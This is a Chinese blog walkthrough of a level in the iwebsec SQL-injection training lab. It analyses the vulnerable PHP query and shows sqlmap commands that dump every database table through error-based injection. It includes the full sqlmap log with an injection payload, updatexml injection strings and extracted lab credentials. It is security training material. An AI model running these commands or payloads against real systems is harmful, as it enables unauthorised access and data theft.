iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入（报错型盲注）

系列文章目录

iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入（宽字节注入）_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记3- bool注入（布尔型盲注）_mooyuan的博客-CSDN博客

iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入（时间型盲注）_mooyuan的博客-CSDN博客

目录

系列文章目录

前言

一、源码分析

二、sqlmap注入

1.注入命令

 2.完整交互过程

总结

---

前言

iwebsec靶场的SQL注入漏洞的第05关updatexml注入漏洞渗透。

​

---

一、源码分析

如下所示，SQL语句与前几关一样，调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入，并且没有对参数id做任何过滤。

​

不过在输出内容中可以得知仅sql查询成功时输出正确的id，用户名和密码。

​不过在错误的时候却执行语句print_r(mysql_error());这个报错语句的使用意味着我们可以利用报错型函数如updatexml，extractvalue等函数进行SQL注入。

二、sqlmap注入

1.注入命令

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch

 如下所示，渗透成功

​

sqlmap发现可以通过4种方法进行渗透成功，这里我们可以指定方法就是error-based，这样的话渗透语句可以写为

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch --technique E

 2.完整交互过程

完整的注入交互如下所示

kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch --technique E
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                  
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:15:21 /2022-11-24/

[23:15:21] [INFO] resuming back-end DBMS 'mysql' 
[23:15:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1776 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(1776=1776,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[23:15:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[23:15:21] [INFO] fetching current database
[23:15:21] [INFO] retrieved: 'iwebsec'
current database: 'iwebsec'
[23:15:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:15:21] [INFO] fetching current database
[23:15:21] [INFO] fetching tables for database: 'iwebsec'
[23:15:21] [INFO] retrieved: 'sqli'
[23:15:21] [INFO] retrieved: 'user'
[23:15:21] [INFO] retrieved: 'users'
[23:15:21] [INFO] retrieved: 'xss'
[23:15:21] [INFO] fetching columns for table 'users' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'username'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'password'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'role'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] fetching entries for table 'users' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'mall123mall'
[23:15:21] [INFO] retrieved: 'admin'
[23:15:21] [INFO] retrieved: 'orange'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[23:15:21] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[23:15:21] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'id'
[23:15:21] [INFO] retrieved: 'int(11)'
[23:15:21] [INFO] retrieved: 'username'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'password'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'email'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[23:15:21] [INFO] retrieved: '[email protected]'
[23:15:21] [INFO] retrieved: '1'
[23:15:21] [INFO] retrieved: 'pass1'
[23:15:21] [INFO] retrieved: 'user1'
[23:15:21] [INFO] retrieved: '[email protected]'
[23:15:21] [INFO] retrieved: '2'
[23:15:21] [INFO] retrieved: 'pass2'
[23:15:21] [INFO] retrieved: 'user2'
[23:15:22] [INFO] retrieved: '[email protected]'
[23:15:22] [INFO] retrieved: '3'
[23:15:22] [INFO] retrieved: 'pass3'
[23:15:22] [INFO] retrieved: 'user3'
[23:15:22] [INFO] retrieved: '[email protected]'
[23:15:22] [INFO] retrieved: '4'
[23:15:22] [INFO] retrieved: 'admin'
[23:15:22] [INFO] retrieved: 'admin'
[23:15:22] [INFO] retrieved: '[email protected]'
[23:15:22] [INFO] retrieved: '5'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: '[email protected]'
[23:15:22] [INFO] retrieved: '6'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: 'ctfs' or updatexml(1,concat(0x7e,(version())),0)#'
[23:15:22] [INFO] retrieved: '[email protected]'
[23:15:22] [INFO] retrieved: '7'
[23:15:22] [INFO] retrieved: '123456'
[23:15:22] [INFO] retrieved: 'iwebsec' or updatexml(1,concat(0x7e,(version())),0)#'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | [email protected]     | pass1    | user1                                                |
| 2  | [email protected]     | pass2    | user2                                                |
| 3  | [email protected]     | pass3    | user3                                                |
| 4  | [email protected]     | admin    | admin                                                |
| 5  | [email protected]           | 123      | 123                                                  |
| 6  | [email protected]          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | [email protected] | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[23:15:22] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:15:22] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:15:22] [INFO] retrieved: 'id'
[23:15:22] [INFO] retrieved: 'int(11)'
[23:15:22] [INFO] retrieved: 'username'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] retrieved: 'password'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] fetching entries for table 'user' in database 'iwebsec'
[23:15:22] [INFO] retrieved: '1'
[23:15:22] [INFO] retrieved: 'pass1'
[23:15:22] [INFO] retrieved: 'user1'
[23:15:22] [INFO] retrieved: '2'
[23:15:22] [INFO] retrieved: 'pass2'
[23:15:22] [INFO] retrieved: 'user2'
[23:15:22] [INFO] retrieved: '3'
[23:15:22] [INFO] retrieved: 'pass3'
[23:15:22] [INFO] retrieved: 'user3'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[23:15:22] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:15:22] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[23:15:22] [INFO] retrieved: 'id'
[23:15:22] [INFO] retrieved: 'int(11)'
[23:15:22] [INFO] retrieved: 'name'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[23:15:22] [INFO] retrieved: '1'
[23:15:22] [INFO] retrieved: 'iwebsec'
[23:15:22] [INFO] retrieved: '5'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '6'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '7'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '8'
[23:15:22] [INFO] retrieved: ''
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 1  | iwebsec                            |
| 5  |  |
| 6  |  |
| 7  |  |
| 8  |                  |
+----+------------------------------------+

[23:15:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[23:15:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:15:22] [WARNING] your sqlmap version is outdated

[*] ending @ 23:15:22 /2022-11-24/

---

总结

通过源码再来分析下时间盲注关卡重点内容：
（1）闭合方式是什么？iwebsec的第05关关卡为数字型注入，无闭合方式
（2）注入类别是什么？这部分是报错型盲注
（3）是否过滤了关键字？很明显通过源码，iwebsec的时间报错型关卡无过滤任何信息
了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习，真正了解原理后可以在使用sqlmap来提升速度。